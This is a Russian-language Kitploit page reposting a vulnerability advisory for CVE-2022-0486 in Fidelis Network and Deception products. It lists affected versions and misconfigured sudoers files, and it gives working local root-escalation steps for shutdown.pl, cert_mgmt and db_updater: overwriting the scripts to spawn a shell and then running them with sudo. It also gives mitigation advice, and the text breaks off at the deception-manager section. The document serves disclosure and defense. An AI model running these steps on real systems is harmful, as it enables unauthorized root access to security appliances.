Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/henryreed/cve-2022-0486
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеRed TeamingЭксплуатация Бинарных Файлов
GitHubhenryreed/cve-2022-0486

CVE-2022-0486

Fidelis Network and Deception — Повышение привилегий через небезопасные разрешения файлов — Множественные

Репозиторий
4 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Fidelis Network и Deception - CVE-2022-0486 - Небезопасные разрешения файлов - повышение привилегий - несколько уязвимостей

Возможность публикации и благодарности

Все эксплойты одобрены для публикации правительством США. Особая благодарность военнослужащим и представителям правительства, ответственным за утверждение документации для неограниченного распространения. Пожалуйста, обратитесь к следующим номерам OTR:

  • OTR-2022-00482
  • OTR-2022-00483
  • OTR-2022-00484
  • OTR-2022-00485
  • OTR-2022-00486
  • OTR-2022-00488
  • OTR-2022-00489
  • OTR-2022-00490

Метаданные

Дата: 20220517 2005H UTC

Автор эксплойта: Henry Reed, The Aerospace Corporation

Сайт производителя: https://fidelissecurity.com/

Затронутые версии:

  • Fidelis CommandPost до 9.4.5
  • Fidelis Collector до 9.4.5
  • Fidelis Sensor до 9.4.5
  • Fidelis Sandbox до 9.4.5

Протестировано на:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Внутренняя ВМ) Sensor 9.4.3

CVE: CVE-2022-0486

Описание CVE: Неправильные разрешения файлов в компонентах CommandPost, Collector, Sensor и Sandbox продуктов Fidelis Network и Deception позволяют злоумышленнику с локальным административным доступом к CLI изменять затронутые файлы и повышать привилегии до уровня root. Уязвимость присутствует в версиях Fidelis Network и Deception до 9.4.5. Для устранения уязвимости доступны исправления и обновления.

Суть дела

В рамках этого CVE существует несколько эксплойтов, поскольку CVE охватывает ряд неправильных разрешений файлов. Все эксплойты обусловлены одной записью NOPASSWD и несколькими парольными привилегиями sudoers, предоставленными пользователю fidelis на бинарные файлы или сценарии, которыми владеет пользователь fidelis, что позволяет пользователю fidelis произвольно изменять файл. Это позволяет локально повысить привилегии.

Затронутый файл с NOPASSWD:

  • /FSS/bin/shutdown.pl

Затронутые файлы, требующие пароль:

  • /FSS/setup/cert_mgmt
  • /FSS/bin/db_updater
  • /FSS/deception-manager/bin/deception-manager
  • /FSS/sbin/fssdbg.sh
  • /FSS/bin/mst
  • /FSS/bin/setup
  • /FSS/setup/unlock_cp_user.sh

Рекомендуется пользователям затронутых продуктов Fidelis Deception или Fidelis Network обновить программное обеспечение для устранения этой уязвимости. Также рекомендуется всем пользователям, независимо от того, были ли они затронуты этой уязвимостью, отключить доступ к оболочке для своих продуктов Fidelis после первоначальной настройки.

Если по какой-либо причине ни то, ни другое невозможно, в этом документе описаны меры по смягчению последствий для каждого уязвимого файла. Насколько показало тестирование автора, пользователям, по-видимому, потребуется использовать одну из этих уязвимостей для повышения привилегий, прежде чем они смогут применить описанные меры, поэтому настоятельно рекомендуется обновить Fidelis и отключить SSH.

shutdown.pl Повышение привилегий

Протестировано на:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Внутренняя ВМ) Sensor 9.4.3

Краткое описание:

Неправильно настроенные права владения на /FSS/bin/shutdown.pl позволяют пользователю fidelis повышать привилегии до уровня root в нескольких продуктах Fidelis. По умолчанию конфигурация sudoers позволяет пользователю fidelis выполнять /FSS/bin/shutdown.pl от имени root без запроса пароля. Файл принадлежит пользователю fidelis, что позволяет ему произвольно изменять сценарий и повышать привилегии.

Эксплойт:

  1. Измените права доступа, чтобы разрешить изменение файла shutdown.pl:
$ chmod 700 /FSS/bin/shutdown.pl
  1. Измените файл по необходимости для выполнения произвольного кода или, в данном примере, для запуска оболочки:
$ echo '#!/usr/bin/perl -w' > /FSS/bin/shutdown.pl
$ echo "exec '/bin/sh';" >> /FSS/bin/shutdown.pl
$ cat /FSS/bin/shutdown.pl
#!/usr/bin/perl -w
exec '/bin/sh';
  1. Запустите файл с помощью команды sudo:
$ sudo /FSS/bin/shutdown.pl

Скриншот, демонстрирующий обнаружение и эксплуатацию уязвимости. Обратите внимание на строку NOPASSWD, которая указывает, что shutdown.pl является потенциальным кандидатом для повышения привилегий:

Смягчение:

Изменение владельца пользователя и группы /FSS/bin/shutdown.pl на root:fidelis и предоставление только прав на чтение и выполнение владельцу группы /FSS/bin/shutdown.pl смягчило бы эту уязвимость:

cert_mgmt Аутентифицированное повышение привилегий

Протестировано на:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis (Внутренняя ВМ) Sensor 9.4.3

Краткое описание:

Неправильно настроенные права владения на /FSS/setup/cert_mgmt позволяют пользователю fidelis повышать привилегии до уровня root в нескольких продуктах Fidelis. По умолчанию конфигурация sudoers позволяет пользователю fidelis выполнять /FSS/setup/cert_mgmt от имени root при вводе пароля. Файл принадлежит пользователю fidelis, что позволяет ему произвольно изменять сценарий и повышать привилегии.

Эксплойт:

  1. Измените права доступа, чтобы разрешить изменение файла cert_mgmt:
$ chmod u+w /FSS/setup/cert_mgmt
  1. Измените файл по необходимости для выполнения произвольного кода или, в данном примере, для запуска оболочки:
$ cp /bin/bash /FSS/setup/cert_mgmt
  1. Запустите файл с помощью команды sudo и аутентифицируйтесь с паролем пользователя fidelis:
$ sudo /FSS/setup/cert_mgmt

Скриншот, демонстрирующий обнаружение и эксплуатацию уязвимости:

Смягчение:

Изменение владельца пользователя и группы /FSS/setup/cert_mgmt на root:fidelis и предоставление только прав на чтение и выполнение владельцу группы /FSS/setup/cert_mgmt смягчило бы эту уязвимость:

db_updater Аутентифицированное повышение привилегий

Протестировано на:

  • Fidelis CommandPost 9.4.3

Краткое описание:

Неправильно настроенные права владения на /FSS/bin/db_updater позволяют пользователю fidelis повышать привилегии до уровня root в Fidelis CommandPost. По умолчанию конфигурация sudoers позволяет пользователю fidelis выполнять /FSS/bin/db_updater от имени root при вводе пароля. Файл принадлежит пользователю fidelis, что позволяет ему произвольно изменять бинарный файл и повышать привилегии.

Эксплойт:

  1. Измените права доступа, чтобы разрешить изменение файла db_updater:
$ chmod u+w /FSS/bin/db_updater
  1. Измените файл по необходимости для выполнения произвольного кода или, в данном примере, для запуска оболочки:
$ cp /bin/bash /FSS/bin/db_updater
  1. Запустите файл с помощью команды sudo и аутентифицируйтесь с паролем пользователя fidelis:
$ sudo /FSS/bin/db_updater

Смягчение:

Изменение владельца пользователя и группы /FSS/bin/db_updater на root:fidelis и предоставление только прав на чтение и выполнение владельцу группы /FSS/bin/db_updater смягчило бы эту уязвимость:

deception-manager Аутентифицированное повышение привилегий

Протестировано на:

  • Fidelis CommandPost 9.4.3
Скачать инструмент